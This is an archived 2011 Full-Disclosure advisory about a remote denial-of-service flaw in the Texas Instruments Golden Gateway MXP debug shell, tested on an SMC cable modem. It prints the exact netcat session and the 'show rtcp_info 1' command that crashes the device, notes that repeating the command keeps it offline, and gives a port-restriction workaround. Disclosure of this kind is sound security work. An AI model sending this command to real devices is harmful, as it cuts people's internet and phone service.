lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4EFC8CD2.3060102@shakingrock.com> Date: Thu, 29 Dec 2011 10:52:50 -0500 From: will <will@...kingrock.com> To: full-disclosure@...ts.grok.org.uk Subject: DoS in TI Golden Gateway MXP Debug Application ####################################################################### Will Urbanski Application: Texas Instruments Golden Gateway MXP Debug Application http://www.ti.com Vuln ID: SHR20111201 Version: 2007 Platforms: Embedded (tested on SMC D3GNV Cable Modem) Bug: input sensitization DoS vuln in `show rtcp_info` Exploitation: remote Date: 01 Dec 2011 Author: Will Urbanski e-mail: will () shakingrock com permalink: http://www.shakingrock.com/vulns/SHR20111201.txt ####################################################################### 1) Introduction 2) `show rctp_info` 3) Impact 4) Workaround ####################################################################### =============== 1) Introduction =============== >>From vendor's homepage: "Golden Gateway® software is designed to run on Texas Instruments (TI) Digital Signal Processors (DSPs). The software, which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers. " ####################################################################### ========================================== 2) `show rctp_info` ========================================== Executing `show rctp_info 1` results in system failure due to a critical process being terminated. The show command is normally used to display system information and should not result in application termination. $ nc 172.16.1.1 4159 ��.��!��.��.Texas Instruments Inc. 2007 Golden Gateway Remote Command Processor MXP>show version show version XGCP Version: 2.7.0 CM Version Label: 2.7.0 [...] MXP>show rtcp_info 1 show rtcp_info 1 MXP>sigterm_prog=0;calling vp880_restart The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the MXP shell. During some of our tests we were unable to regain internet connectivity until the device had been unplugged. In the event that connectivity is restored spamming "show rtcp_info 1" to the MXP shell will ensure the device stays offline. ####################################################################### =========== 3) Impact =========== As mentioned on the vendors site the Golden Gateway Remote Command Processor MXP Debug Application is included in many embedded networking devices. "The software, which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers." This remote denial of service was discovered in an SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and cable internet capabilities. This vulnerability _may_ be found on any device that allows unauthenticated access to the MXP Debug Application shell. ####################################################################### ============== 4) Workaround ============== Restrict access to port tcp/4159 on devices that are allowing unauthenticated access to the MXP Debug Application. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists